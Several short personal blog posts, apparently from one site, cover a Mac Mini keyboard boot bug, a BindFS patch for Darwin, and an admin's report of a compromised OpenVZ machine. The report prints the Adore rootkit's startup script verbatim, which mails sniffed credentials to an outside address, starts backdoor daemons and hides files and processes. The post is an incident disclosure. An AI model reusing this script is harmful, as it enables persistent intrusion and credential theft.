: reckoning

An old Mac Mini, or as the Leopard a MacMini1,1 @ 1.66GHz (x 2), 2048 MB RAM, while booting it doesn’t respond to any of the startup sequences only when I’m using the new Aluminum Apple Keyboard. When I’m using an old Apple Pro Keyboard, everything works fine.

And here’s the kicker: while the Mini starts up, I get into the “select startup disk mode” using the old keyboard—I’m able to navigate between the choices with the old keyboard. If I switch the the new keyboard, nothing works.

For some obscure to me reason, MacMini1,1 doesn’t recognize the Aluminum Apple Keyboard while it’s starting up.

Apple has been notified of the bug and from what I can tell, they’re already aware of the bug. The details of the Mac Mini are (Model Identifier: Macmini1,1; Boot ROM Version: MM11.0055.B08; SMC Version: 1.3f4).

Related posts: No related posts.

I just finished writing a patch for BindFS, a FUSE file-system, to work under Darwin 9:

diff -urN bindfs-1.4.1/src/bindfs.c bindfs-1.4.1-darwin/src/bindfs.c
--- bindfs-1.4.1/src/bindfs.c	2007-07-17 15:28:25.000000000 -0500
+++ bindfs-1.4.1-darwin/src/bindfs.c	2007-11-12 05:52:15.000000000 -0600
@@ -52,6 +52,8 @@
 #include "userinfo.h"
 #include "misc.h"
 
+#include <libgen .h>
+
 /* SETTINGS */
 static struct settings {
     const char *progname;
@@ -636,7 +638,7 @@
 
     /* fuse checks permissions for us */
     path = process_path(path);
-    if (lsetxattr(path, name, value, size, flags) == -1)
+    if (setxattr(path, name, value, size, 0, flags | XATTR_NOFOLLOW) == -1)
         return -errno;
     return 0;
 }
@@ -648,7 +650,7 @@
 
     path = process_path(path);
     /* fuse checks permissions for us */
-    res = lgetxattr(path, name, value, size);
+    res = getxattr(path, name, value, size, 0, XATTR_NOFOLLOW);
     if (res == -1)
         return -errno;
     return res;
@@ -660,7 +662,7 @@
 
     path = process_path(path);
     /* fuse checks permissions for us */
-    res = llistxattr(path, list, size);
+    res = listxattr(path, list, size, XATTR_NOFOLLOW);
     if (res == -1)
         return -errno;
     return res;
@@ -673,7 +675,7 @@
 
     path = process_path(path);
     /* fuse checks permissions for us */
-    if (lremovexattr(path, name) == -1)
+    if (removexattr(path, name, XATTR_NOFOLLOW) == -1)
         return -errno;
     return 0;
 }
@@ -795,7 +797,7 @@
     switch ((enum OptionKey)key)
     {
     case OPTKEY_HELP:
-        print_usage(basename(settings.progname));
+        print_usage(basename((const char*) settings.progname));
         exit(0);
 
     case OPTKEY_VERSION:
</libgen>

I aspire to submit that to MacPorts and/or to BindFS fairly soon.

Related posts: No related posts.

Now therefore, be it declared, that this establishment shall accept patch files only in

diff -urN

format.

Related posts: No related posts.

A few days ago I discovered that a virtual machine on my OpenVZ server was compromised. The server was exploited and the Adore Rootkit was installed. It emailed data to darkorc3@yahoo.com on startup. The following script was installed on every run level in rc.d:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

#!/bin/sh
cd /usr/bin/.tmp
./vad tcp.log >conturi.log
cat /usr/bin/.tmp/conturi.log|mail -s "back" darkorc3@yahoo.com
rm -rf /usr/bin/.tmp/tcp.log
./sshd -f sshd_config
./httpd &
/sbin/insmod -f adore.o > /dev/null 2>&1
/sbin/insmod -f cleaner.o > /dev/null 2>&1
/sbin/rmmod cleaner > /dev/null 2>&1
./ava i `cat pid` > /dev/null 2>&1
./ava i `cat sniff.pid` > /dev/null 2>&1
./ava h . > /dev/null 2>&1
for i in {2,3,4,5}
do
./ava h /etc/rc.d/rc$i.d/S96daemon > /dev/null 2>&1
done
./ava h /proc/ksyms > /dev/null 2>&1

In my few years as a Linux system administrator this is the smarter, most potentially harmful, and most elegant exploit I have come across. If you have or need any more information, please let me know.

Related posts: No related posts.

A description of how software detects the image of a currency pinpoints one and only one thing: the sad efficiency of security by obscurity and how the capitalist software market imposed a standard. I wonder to what extent GIMP would be able to adhere to such standards.

Related posts: No related posts.